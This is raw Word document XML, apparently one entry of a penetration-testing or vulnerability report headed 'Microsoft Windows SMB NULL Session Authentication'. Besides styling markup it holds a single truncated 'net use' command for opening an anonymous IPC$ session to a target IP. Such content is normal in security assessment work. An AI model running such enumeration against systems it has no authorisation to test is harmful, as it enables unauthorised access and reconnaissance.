    <w:p w14:paraId="2DBE25E0" w14:textId="77777777" w:rsidR="00087892" w:rsidRPr="00087892" w:rsidRDefault="00087892" w:rsidP="00087892">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc14771827"/>
      <w:r w:rsidRPr="00087892">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Microsoft Windows SMB NULL Session Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="10628E14" w14:textId="1F67C63C" w:rsidR="00545F77" w:rsidRPr="00A4521F" w:rsidRDefault="00545F77" w:rsidP="00087892">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidRPr="00A4521F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net use </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00087892" w:rsidRPr="00C361FA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>\\</w:t>
        </w:r>
        <w:r w:rsidR="00087892" w:rsidRPr="00C361FA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>&lt;ip&gt;</w:t>
        </w:r>
        <w:r w:rsidR="00087892" w:rsidRPr="00C361FA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>\ipc$</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A4521F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “” “/user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E2945C" w14:textId="77777777" w:rsidR="00545F77" w:rsidRDefault="00545F77" w:rsidP="00545F77"/>
    <w:sectPr w:rsidR="00545F7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default"/>
  </w:font>
  <w:font w:name="Open Sans">
    <w:altName w:val="Segoe UI"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Raleway">
    <w:altName w:val="Trebuchet MS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rdo">
    <w:altName w:val="Calibri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nsolas-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148"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BD26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510E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6AC2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34764C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02A265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352"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="213A00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502"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4ADAFC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86332"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A30B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F31017"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01206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7B5290"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DD8F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DA51D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A3A17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7E54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="491E78A4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D47DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60C4B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E95DE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B8CF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CD58DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EA67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C03631"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F3E0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6E36B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54781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AC299C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="185282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53A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E57C82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747"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0714E1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7BCF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D25CB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B97FA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30DCBD76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C9A0D67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD2CDF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356F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="622CC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37FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C4E29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87F0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0C88F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BF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="971CBB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056E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2DE7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8D13613"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D9CBC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05BAB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF98A8E6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D074F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D25CB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FCC05CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CFAA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FD7324F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FF620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B4EFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7668D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A71D65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB84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C2B76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01FC8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71D3418"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A741D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92178"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="863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20F60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F20C47F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31BC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAE62C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B6890"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB4843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97045"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91726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8D34467"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5492E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05D25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="412809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11858"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="392A67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F7CC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7AB8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C1E7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7300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BDC077F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7932017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4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="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05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E8"/>
    <w:rsid w:val="0000494E"/>
    <w:rsid w:val="0001045C"/>
    <w:rsid w:val="00010F4A"/>
    <w:rsid w:val="00014FEC"/>
    <w:rsid w:val="00027505"/>
    <w:rsid w:val="000376DC"/>
    <w:rsid w:val="00067390"/>
    <w:rsid w:val="0007288C"/>
    <w:rsid w:val="00077C80"/>
    <w:rsid w:val="00087892"/>
    <w:rsid w:val="000962DA"/>
    <w:rsid w:val="000A542A"/>
    <w:rsid w:val="000A6BD2"/>
    <w:rsid w:val="000B4353"/>
    <w:rsid w:val="000B4E68"/>
    <w:rsid w:val="000C7F28"/>
    <w:rsid w:val="000D0BBA"/>
    <w:rsid w:val="000D5983"/>
    <w:rsid w:val="00115CF8"/>
    <w:rsid w:val="00127026"/>
    <w:rsid w:val="001348FC"/>
    <w:rsid w:val="0014604E"/>
    <w:rsid w:val="00147126"/>
    <w:rsid w:val="00153C8D"/>
    <w:rsid w:val="00197F77"/>
    <w:rsid w:val="001A3DE7"/>
    <w:rsid w:val="001E3001"/>
    <w:rsid w:val="001F2C75"/>
    <w:rsid w:val="001F3F01"/>
    <w:rsid w:val="002253E4"/>
    <w:rsid w:val="00225511"/>
    <w:rsid w:val="0023692A"/>
    <w:rsid w:val="00243E93"/>
    <w:rsid w:val="002617C6"/>
    <w:rsid w:val="00262AF0"/>
    <w:rsid w:val="00265FCF"/>
    <w:rsid w:val="00270B3D"/>
    <w:rsid w:val="00276D9E"/>
    <w:rsid w:val="0028469E"/>
    <w:rsid w:val="00293438"/>
    <w:rsid w:val="0029563B"/>
    <w:rsid w:val="002C013C"/>
    <w:rsid w:val="002E15ED"/>
    <w:rsid w:val="002E1FE8"/>
    <w:rsid w:val="002F46CC"/>
    <w:rsid w:val="002F487B"/>
    <w:rsid w:val="00304AF8"/>
    <w:rsid w:val="00305B3E"/>
    <w:rsid w:val="00306E5F"/>
    <w:rsid w:val="003171E3"/>
    <w:rsid w:val="0032110B"/>
    <w:rsid w:val="00340805"/>
    <w:rsid w:val="00341E23"/>
    <w:rsid w:val="00342A2E"/>
    <w:rsid w:val="00344D9F"/>
    <w:rsid w:val="00345EAD"/>
    <w:rsid w:val="00351618"/>
    <w:rsid w:val="00382BDB"/>
    <w:rsid w:val="00385C34"/>
    <w:rsid w:val="003C6984"/>
    <w:rsid w:val="003E6157"/>
    <w:rsid w:val="00404200"/>
    <w:rsid w:val="00431638"/>
    <w:rsid w:val="00455842"/>
    <w:rsid w:val="00463DF1"/>
    <w:rsid w:val="00465F98"/>
    <w:rsid w:val="00472ECD"/>
    <w:rsid w:val="00480D1C"/>
    <w:rsid w:val="00493538"/>
    <w:rsid w:val="00496F66"/>
    <w:rsid w:val="004A1297"/>
    <w:rsid w:val="004A169C"/>
    <w:rsid w:val="004A465B"/>
    <w:rsid w:val="004B4EA8"/>
    <w:rsid w:val="004C1FCB"/>
    <w:rsid w:val="004C3096"/>
    <w:rsid w:val="004C3CAA"/>
    <w:rsid w:val="004D384F"/>
    <w:rsid w:val="004D52A3"/>
    <w:rsid w:val="004E30CC"/>
    <w:rsid w:val="004F3DC2"/>
    <w:rsid w:val="004F416B"/>
    <w:rsid w:val="00500DA2"/>
    <w:rsid w:val="0052246F"/>
    <w:rsid w:val="00525A42"/>
    <w:rsid w:val="00526D89"/>
    <w:rsid w:val="0053146A"/>
    <w:rsid w:val="00542018"/>
    <w:rsid w:val="00542A6E"/>
    <w:rsid w:val="00542B2B"/>
    <w:rsid w:val="00545F77"/>
    <w:rsid w:val="00554908"/>
    <w:rsid w:val="00560540"/>
    <w:rsid w:val="005618DA"/>
    <w:rsid w:val="00562952"/>
    <w:rsid w:val="005734B5"/>
    <w:rsid w:val="005843A4"/>
    <w:rsid w:val="00587AFF"/>
    <w:rsid w:val="005B5776"/>
    <w:rsid w:val="005B6963"/>
    <w:rsid w:val="005C01F8"/>
    <w:rsid w:val="005C3FDF"/>
    <w:rsid w:val="005D0890"/>
    <w:rsid w:val="005D70E0"/>
    <w:rsid w:val="005E17B7"/>
    <w:rsid w:val="005E57C2"/>
    <w:rsid w:val="005F1126"/>
    <w:rsid w:val="005F6D8C"/>
    <w:rsid w:val="00627BCA"/>
    <w:rsid w:val="0063385B"/>
    <w:rsid w:val="00633F3B"/>
    <w:rsid w:val="00637CB1"/>
    <w:rsid w:val="00646782"/>
    <w:rsid w:val="00666B46"/>
    <w:rsid w:val="00670BA3"/>
    <w:rsid w:val="00685C41"/>
    <w:rsid w:val="00691356"/>
    <w:rsid w:val="00694B65"/>
    <w:rsid w:val="006956A7"/>
    <w:rsid w:val="006B002F"/>
    <w:rsid w:val="006B1C9D"/>
    <w:rsid w:val="006B2FBE"/>
    <w:rsid w:val="006C082C"/>
    <w:rsid w:val="006C4A87"/>
    <w:rsid w:val="006C581B"/>
    <w:rsid w:val="006D192B"/>
    <w:rsid w:val="006D74D7"/>
    <w:rsid w:val="00704645"/>
    <w:rsid w:val="007139B6"/>
    <w:rsid w:val="007214D6"/>
    <w:rsid w:val="00731BC8"/>
    <w:rsid w:val="00734023"/>
    <w:rsid w:val="00734E32"/>
    <w:rsid w:val="007351F7"/>
    <w:rsid w:val="007407DB"/>
    <w:rsid w:val="00741D1A"/>
    <w:rsid w:val="00753663"/>
    <w:rsid w:val="00773258"/>
    <w:rsid w:val="007901F6"/>
    <w:rsid w:val="00791586"/>
    <w:rsid w:val="00795DE5"/>
    <w:rsid w:val="007975DD"/>
    <w:rsid w:val="007A32C7"/>
    <w:rsid w:val="007B6F3B"/>
    <w:rsid w:val="007C3A1F"/>
    <w:rsid w:val="007D0B4B"/>
    <w:rsid w:val="007D4B24"/>
    <w:rsid w:val="007D573A"/>
    <w:rsid w:val="007D65D7"/>
    <w:rsid w:val="007E3C1A"/>
    <w:rsid w:val="00807D2E"/>
    <w:rsid w:val="008162FC"/>
    <w:rsid w:val="00836C37"/>
    <w:rsid w:val="00841DCF"/>
    <w:rsid w:val="00841EB8"/>
    <w:rsid w:val="00844E35"/>
    <w:rsid w:val="0084732D"/>
    <w:rsid w:val="00847FE9"/>
    <w:rsid w:val="0085261F"/>
    <w:rsid w:val="00854F9A"/>
    <w:rsid w:val="00856947"/>
    <w:rsid w:val="0086539E"/>
    <w:rsid w:val="00865DF5"/>
    <w:rsid w:val="008708EC"/>
    <w:rsid w:val="00873AE3"/>
    <w:rsid w:val="00874A45"/>
    <w:rsid w:val="00874B44"/>
    <w:rsid w:val="0087669F"/>
    <w:rsid w:val="00880644"/>
    <w:rsid w:val="0088209C"/>
    <w:rsid w:val="00883142"/>
    <w:rsid w:val="00890E08"/>
    <w:rsid w:val="00891DC4"/>
    <w:rsid w:val="00897F38"/>
    <w:rsid w:val="008B37A8"/>
    <w:rsid w:val="008B4616"/>
    <w:rsid w:val="008B4B37"/>
    <w:rsid w:val="008C4E39"/>
    <w:rsid w:val="008D26C7"/>
    <w:rsid w:val="008E162F"/>
    <w:rsid w:val="008E6012"/>
    <w:rsid w:val="008F2EFA"/>
    <w:rsid w:val="00910B70"/>
    <w:rsid w:val="00912409"/>
    <w:rsid w:val="00953334"/>
    <w:rsid w:val="0095506B"/>
    <w:rsid w:val="00957DEE"/>
    <w:rsid w:val="00965031"/>
    <w:rsid w:val="0097547E"/>
    <w:rsid w:val="00986FFD"/>
    <w:rsid w:val="009A6581"/>
    <w:rsid w:val="009B6203"/>
    <w:rsid w:val="009C5251"/>
    <w:rsid w:val="009D06DC"/>
    <w:rsid w:val="009D140C"/>
    <w:rsid w:val="009D4827"/>
    <w:rsid w:val="009F2CCD"/>
    <w:rsid w:val="00A07EEE"/>
    <w:rsid w:val="00A13167"/>
    <w:rsid w:val="00A13199"/>
    <w:rsid w:val="00A15C20"/>
    <w:rsid w:val="00A209A3"/>
    <w:rsid w:val="00A47EAC"/>
    <w:rsid w:val="00A57477"/>
    <w:rsid w:val="00A7680B"/>
    <w:rsid w:val="00A8359D"/>
    <w:rsid w:val="00A85E5F"/>
    <w:rsid w:val="00A937BC"/>
    <w:rsid w:val="00AC4C7F"/>
    <w:rsid w:val="00AD7BB2"/>
    <w:rsid w:val="00AE12C4"/>
    <w:rsid w:val="00AF217A"/>
    <w:rsid w:val="00B0172B"/>
    <w:rsid w:val="00B07108"/>
    <w:rsid w:val="00B27C54"/>
    <w:rsid w:val="00B30042"/>
    <w:rsid w:val="00B31CE3"/>
    <w:rsid w:val="00B36ACC"/>
    <w:rsid w:val="00B5219E"/>
    <w:rsid w:val="00B52660"/>
    <w:rsid w:val="00B52AEB"/>
    <w:rsid w:val="00B55751"/>
    <w:rsid w:val="00B563FC"/>
    <w:rsid w:val="00B60386"/>
    <w:rsid w:val="00B6300E"/>
    <w:rsid w:val="00B643AB"/>
    <w:rsid w:val="00B675BB"/>
    <w:rsid w:val="00B82861"/>
    <w:rsid w:val="00B9509B"/>
    <w:rsid w:val="00B971AC"/>
    <w:rsid w:val="00BA5DE9"/>
    <w:rsid w:val="00BB10F1"/>
    <w:rsid w:val="00BB1490"/>
    <w:rsid w:val="00BB44DC"/>
    <w:rsid w:val="00BB652A"/>
    <w:rsid w:val="00BC0AE0"/>
    <w:rsid w:val="00BD78D3"/>
    <w:rsid w:val="00BE03FF"/>
    <w:rsid w:val="00BE3F14"/>
    <w:rsid w:val="00BF35AD"/>
    <w:rsid w:val="00C00CCF"/>
    <w:rsid w:val="00C01F9E"/>
    <w:rsid w:val="00C20A75"/>
    <w:rsid w:val="00C36478"/>
    <w:rsid w:val="00C574F6"/>
    <w:rsid w:val="00C63C23"/>
    <w:rsid w:val="00C71D5A"/>
    <w:rsid w:val="00C9284D"/>
    <w:rsid w:val="00C96FFD"/>
    <w:rsid w:val="00CA330A"/>
    <w:rsid w:val="00CB0615"/>
    <w:rsid w:val="00CD1B21"/>
    <w:rsid w:val="00CD6F11"/>
    <w:rsid w:val="00CE65B5"/>
    <w:rsid w:val="00CF75C9"/>
    <w:rsid w:val="00D0273D"/>
    <w:rsid w:val="00D0759E"/>
    <w:rsid w:val="00D23D31"/>
    <w:rsid w:val="00D506AD"/>
    <w:rsid w:val="00D56616"/>
    <w:rsid w:val="00D70076"/>
    <w:rsid w:val="00D7215C"/>
    <w:rsid w:val="00D72D30"/>
    <w:rsid w:val="00D76EC5"/>
    <w:rsid w:val="00D82EB1"/>
    <w:rsid w:val="00D929F0"/>
    <w:rsid w:val="00D93E06"/>
    <w:rsid w:val="00DA15EC"/>
    <w:rsid w:val="00DA1A96"/>
    <w:rsid w:val="00DC15F5"/>
    <w:rsid w:val="00DC53DC"/>
    <w:rsid w:val="00DC5746"/>
    <w:rsid w:val="00DC6D2F"/>
    <w:rsid w:val="00DE65AA"/>
    <w:rsid w:val="00E06C11"/>
    <w:rsid w:val="00E22741"/>
    <w:rsid w:val="00E43790"/>
    <w:rsid w:val="00E500FB"/>
    <w:rsid w:val="00E51C93"/>
    <w:rsid w:val="00E62489"/>
    <w:rsid w:val="00E849B5"/>
    <w:rsid w:val="00E949F7"/>
    <w:rsid w:val="00E94D23"/>
    <w:rsid w:val="00EB1D3E"/>
    <w:rsid w:val="00EC4EC0"/>
    <w:rsid w:val="00F10B27"/>
    <w:rsid w:val="00F17F29"/>
    <w:rsid w:val="00F21F75"/>
    <w:rsid w:val="00F23F1E"/>
    <w:rsid w:val="00F570DC"/>
    <w:rsid w:val="00F5761E"/>
    <w:rsid w:val="00F57C3C"/>
    <w:rsid w:val="00F619F2"/>
    <w:rsid w:val="00F72546"/>
    <w:rsid w:val="00F80AC0"/>
    <w:rsid w:val="00F862AB"/>
    <w:rsid w:val="00F873FB"/>
    <w:rsid w:val="00F924C7"/>
    <w:rsid w:val="00F92796"/>
    <w:rsid w:val="00F953CE"/>
    <w:rsid w:val="00FA0589"/>
    <w:rsid w:val="00FC49A3"/>
    <w:rsid w:val="00FC52F5"/>
    <w:rsid w:val="00FD3F0C"/>
    <w:rsid w:val="00FD5114"/>
    <w:rsid w:val="00FD737C"/>
    <w:rsid w:val="00FE48FE"/>
    <w:rsid w:val="00FE5A6B"/>
    <w:rsid w:val="00FF0DC9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7CE46"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B23BA01B-11CC-475B-A24C-DB7B7F7B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F7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1F7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat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1F7"/>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28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7351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51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1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29F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1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0F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949F7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E949F7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E949F7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E949F7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0047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t0">
    <w:name w:val="st0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00472ECD"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F2C7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87AFF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87AFF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00587AFF"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="007E3C1A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008708EC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008708EC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008708EC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CA330A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s">
    <w:name w:val="s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CA330A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line">
    <w:name w:val="line"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FC52F5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FC52F5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00BA5D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nt">
    <w:name w:val="nt"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BA5DE9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00B6300E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="en"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kw2">
    <w:name w:val="kw2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00836C37"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="re5">
    <w:name w:val="re5"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00836C37"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nu0">
    <w:name w:val="nu0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00836C37"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00965031"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F86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AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Arial" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
